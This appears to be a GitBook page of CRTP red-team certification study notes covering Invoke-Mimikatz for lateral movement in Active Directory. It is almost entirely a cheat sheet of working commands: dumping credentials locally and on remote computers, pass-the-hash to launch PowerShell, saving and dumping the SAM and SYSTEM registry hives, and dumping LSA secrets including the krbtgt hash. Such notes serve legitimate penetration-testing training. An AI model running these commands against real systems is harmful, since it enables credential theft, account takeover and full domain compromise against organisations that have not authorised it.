CRTP Certified Red Team Professional
AuthorDiscordHTB Pro LabsHTB CPTSHTB CDSA
  • šŸ‘Øā€šŸš’Certified Red Team Professional
  • LAB Access
  • šŸ”„Assume Breach Execution Cycle
  • šŸ˜†Prepare your VM
    • šŸ˜…PowerShell Detections
    • šŸ”„AMSI Bypass
    • šŸ™ƒTools
    • CMD Commands
    • 🤣Escape the Machine
  • Data Visualization
    • BloodHound
    • AzureHound
    • RustHound
  • Domain Enumeration
    • 1ļøāƒ£Tools
    • 2ļøāƒ£Domain Enumeration
    • 3ļøāƒ£Users, Groups, Computers Enumeration
    • 4ļøāƒ£Shares Enumeration
    • 5ļøāƒ£GPO Enumeration
    • 6ļøāƒ£ACLs Enumeration
    • 7ļøāƒ£Domain Trusts
    • Domain Forests
    • 9ļøāƒ£Miscellaneous Enumeration
    • User Hunting
  • Local Privilege Escalation
    • Theory
    • Automation Tools
    • Techniques
  • Lateral Movement
    • Thinking
    • WinRS
    • PowerShell Remoting
    • Invoke-MimiKatz
    • CrackMapExec
  • Domain Persistence
    • šŸ”„Golden tickets
    • 🄈Silver Tickets
    • šŸ’ŽDiamond Tickets
    • šŸš’Skeleton Keys
    • DSRM
    • Custom SSP - Track logons
    • ACLs
      • 1ļøāƒ£AdminSDHolder
      • 2ļøāƒ£DCsync
      • 3ļøāƒ£WMI
      • 4ļøāƒ£Remote Powershell
      • 5ļøāƒ£Remote Registry
  • Domain Privilege Escalation
    • 🟢Kerberoast
    • 🟢AS-REPS Roasting
    • 🟢Set SPN
    • 🟢Unconstrained Delegation
    • 🟢Constrained Delegation
    • 🟢DNS Admins
    • Enterprise Admins
      • Child to parent - Trust tickets
      • Child to parent - krbtgt hash
    • 🟢Crossforest attacks
    • AD CS
    • 🟢Abuse MSSQL Servers
Powered by GitBook
On this page
  • Mimikatz dump credentials on local machine
  • Mimikatz dump credentials on multiple remote machines
  • Mimikatz start powershell pass the hash (run as local admin)
  • Mimikatz dump from SAM
  • Mimikatz dump lsa (krbtgt to)

Was this helpful?

  1. Lateral Movement

Invoke-MimiKatz

Mimikatz dump credentials on local machine

Invoke-Mimikatz -Dumpcreds

Mimikatz dump credentials on multiple remote machines

Invoke-Mimikatz -Dumpcreds -Computername @(ā€œ<system1>ā€,ā€<system2>ā€)
Invoke-Mimikatz -Dumpcreds -ComputerName @("<computername 1>","<computername 2>")

Mimikatz start powershell pass the hash (run as local admin)

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlm hash> /run:powershell.exe"'

Mimikatz dump from SAM

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'

or

reg save HKLM\SAM SamBkup.hiv
reg save HKLM\System SystemBkup.hiv
#Start mimikatz as administrator
privilege::debug
token::elevate
lsadump::sam SamBkup.hiv SystemBkup.hiv

Mimikatz dump lsa (krbtgt to)

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>
PreviousPowerShell RemotingNextCrackMapExec

Last updated 1 year ago

Was this helpful?